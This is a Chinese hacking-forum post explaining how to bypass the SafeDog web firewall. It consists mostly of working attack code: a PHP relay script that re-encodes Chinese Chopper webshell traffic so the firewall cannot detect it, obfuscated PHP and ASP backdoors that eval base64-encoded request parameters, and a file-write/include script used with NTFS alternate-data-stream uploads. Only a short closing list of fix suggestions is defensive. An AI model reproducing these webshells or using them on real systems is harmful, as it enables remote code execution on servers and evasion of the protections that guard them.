Bypass SafeDog【突破安全狗】

90_

0×00 安全狗之菜刀的突破
#原理：
BAD: caidao -> safedog -X-> backdoor
GOOD: caidao -> middle -> safedog -> backdoor -> middle -> caidao
菜刀发送的数据是会被安全狗拦截，因为菜刀的发的数据已被纳入安全狗的特征码内
但是如果我们在菜刀与狗之间放一个加密数据的脚本，将原数据进行修改加密，然后再通过脚本发送出去
类似为一个代理，发出去的数据流到安全狗，因为没有特征码了，数据流到服务器上的shell，shell把加密后的数据进行解密然后再执行，执行完后将数据返回给代理脚本，最终流回菜刀。
#代码
#middle.php

1. 
   
2. <?php
   
3.         /*
   
4.          * Author: Laterain
   
5.          * Time: 20130821
   
6.          * About: Middle monkey between the hacker and safedog.
   
7.          * Just For Fun
   
8.          */
   
9.         $url = isset($_GET['shell'])?$_GET['shell']:'';
   
10.         $pass= isset($_GET['pass'])?$_GET['pass']:'';
    
11.         $type= isset($_GET['type'])?$_GET['type']:'php';
    
12.         if ($type == 'php') {
    
13.                 $shellcode = base64_encode('@eval(base64_decode($_POST[z0]));');
    
14.         }
    
15.         elseif ($type == 'asp') {
    
16.                 $shellcode = base64_encode($_POST[$pass]);
    
17.         }
    
18.         $shellcode = $pass.'='.urlencode($shellcode);
    
19.         foreach ($_POST as $key => $value) {
    
20.                 if ($key == $pass) {
    
21.                         continue;
    
22.                 }
    
23.                 $shellcode .= '&'.$key.'='.urlencode($value);
    
24.         }
    
25.         $ch = curl_init();
    
26.         curl_setopt($ch, CURLOPT_URL, $url);
    
27.         curl_setopt($ch, CURLOPT_HEADER, 0);
    
28.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    
29.         curl_setopt($ch, CURLOPT_POST, 1);
    
30.         curl_setopt($ch, CURLOPT_POSTFIELDS, $shellcode);
    
31.         $data = curl_exec($ch);
    
32.         curl_close($ch);
    
33.         print_r($data);
    
34. ?>
    

复制代码

#php backdoor

1. 
   
2. <?php
   
3. $key = "hack";
   
4. preg_replace(base64_decode('L2EvZQ=='),base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFska2V5XSkp'),'a');
   
5. ?>
   

复制代码

#asp backdoor

1. 
   
2. <%
   
3.      OPTION EXPLICIT
   
4.      const BASE_64_MAP_INIT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
   
5.      dim Base64EncMap(63)
   
6.      dim Base64DecMap(127)
   
7.          dim code
   
8.      '初始化函数
   
9.      PUBLIC SUB initCodecs()
   
10.           ' 初始化变量
    
11.           dim max, idx
    
12.              max = len(BASE_64_MAP_INIT)
    
13.           for idx = 0 to max - 1
    
14.                Base64EncMap(idx) = mid(BASE_64_MAP_INIT, idx + 1, 1)
    
15.           next
    
16.           for idx = 0 to max - 1
    
17.                Base64DecMap(ASC(Base64EncMap(idx))) = idx
    
18.           next
    
19.      END SUB
    
20.      'Base64加密函数
    
21.      PUBLIC FUNCTION base64Encode(plain)
    
22.           if len(plain) = 0 then
    
23.                base64Encode = ""
    
24.                exit function
    
25.           end if
    
26.           dim ret, ndx, by3, first, second, third
    
27.           by3 = (len(plain) \ 3) * 3
    
28.           ndx = 1
    
29.           do while ndx <= by3
    
30.                first = asc(mid(plain, ndx+0, 1))
    
31.                second = asc(mid(plain, ndx+1, 1))
    
32.                third = asc(mid(plain, ndx+2, 1))
    
33.                ret = ret & Base64EncMap( (first \ 4) AND 63 )
    
34.                ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second \ 16) AND 15 ) )
    
35.                ret = ret & Base64EncMap( ((second * 4) AND 60) + ((third \ 64) AND 3 ) )
    
36.                ret = ret & Base64EncMap( third AND 63)
    
37.                ndx = ndx + 3
    
38.           loop
    
39.           if by3 < len(plain) then
    
40.                first = asc(mid(plain, ndx+0, 1))
    
41.                ret = ret & Base64EncMap( (first \ 4) AND 63 )
    
42.                if (len(plain) MOD 3 ) = 2 then
    
43.                     second = asc(mid(plain, ndx+1, 1))
    
44.                     ret = ret & Base64EncMap( ((first * 16) AND 48) + ((second \ 16) AND 15 ) )
    
45.                     ret = ret & Base64EncMap( ((second * 4) AND 60) )
    
46.                else
    
47.                     ret = ret & Base64EncMap( (first * 16) AND 48)
    
48.                     ret = ret '& "="
    
49.                end if
    
50.                ret = ret '& "="
    
51.           end if
    
52.           base64Encode = ret
    
53.      END FUNCTION
    
54.      'Base64解密函数
    
55.      PUBLIC FUNCTION base64Decode(scrambled)
    
56.           if len(scrambled) = 0 then
    
57.                base64Decode = ""
    
58.                exit function
    
59.           end if
    
60.           dim realLen
    
61.           realLen = len(scrambled)
    
62.           do while mid(scrambled, realLen, 1) = "="
    
63.                realLen = realLen - 1
    
64.           loop
    
65.           dim ret, ndx, by4, first, second, third, fourth
    
66.           ret = ""
    
67.           by4 = (realLen \ 4) * 4
    
68.           ndx = 1
    
69.           do while ndx <= by4
    
70.                first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
    
71.                second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
    
72.                third = Base64DecMap(asc(mid(scrambled, ndx+2, 1)))
    
73.                fourth = Base64DecMap(asc(mid(scrambled, ndx+3, 1)))
    
74.                ret = ret & chr( ((first * 4) AND 255) +   ((second \ 16) AND 3))
    
75.                ret = ret & chr( ((second * 16) AND 255) + ((third \ 4) AND 15))
    
76.                ret = ret & chr( ((third * 64) AND 255) + (fourth AND 63))
    
77.                ndx = ndx + 4
    
78.           loop
    
79.           if ndx < realLen then
    
80.                first = Base64DecMap(asc(mid(scrambled, ndx+0, 1)))
    
81.                second = Base64DecMap(asc(mid(scrambled, ndx+1, 1)))
    
82.                ret = ret & chr( ((first * 4) AND 255) +   ((second \ 16) AND 3))
    
83.                if realLen MOD 4 = 3 then
    
84.                     third = Base64DecMap(asc(mid(scrambled,ndx+2,1)))
    
85.                     ret = ret & chr( ((second * 16) AND 255) + ((third \ 4) AND 15))
    
86.                end if
    
87.           end if
    
88.           base64Decode = ret
    
89.      END FUNCTION
    
90. ' 初始化
    
91.     call initCodecs
    
92.         code = request("hack")
    
93.         code = base64Decode(code)
    
94.         eval code
    
95. %>
    

复制代码

0×01 安全狗之突破恶意代码拦截
原理：
php://input没有被检查，在这儿写恶意代码即可。
以ADS的方式上传了shell之后，包含即可。
base.php

1. 
   
2. <?php
   
3. if (isset($_GET['inc'])) {
   
4.         include($_GET['inc']);      
   
5. }
   
6. elseif (isset($_GET['path'])) {
   
7.         fwrite(fopen($_GET['path'], "w"), file_get_contents("php://input"));
   
8. }
   
9. else {
   
10.         echo __FILE__;
    
11. }
    
12. ?>
    

复制代码

#修复建议：
1.因为有了middle的任意加密混淆与backdoor的对应解密，安全狗官方应该也很难解决拦截菜刀数据的问题，但是可以从backdoor入手，加强对服务器后门的扫描探测能有效的防止这个问题。
2.通过包含来获取shell，这就只有加强特征码了。
3.无法发现ADS创建的后门的问题，我的想法是，服务器自身是不允许访问ads创建的文件的，只能通过包含来访问，那么可以将include，require等里面带:的归为危险文件。当然能直接发现更好。
4.php://input内容过滤
PS:本来以为php://input是我最先发现的，但是昨天看见某某在freebuf上提到了这个的利用，我就被打击了。。。于是就发出来吧。。。
作者：laterain form 90sec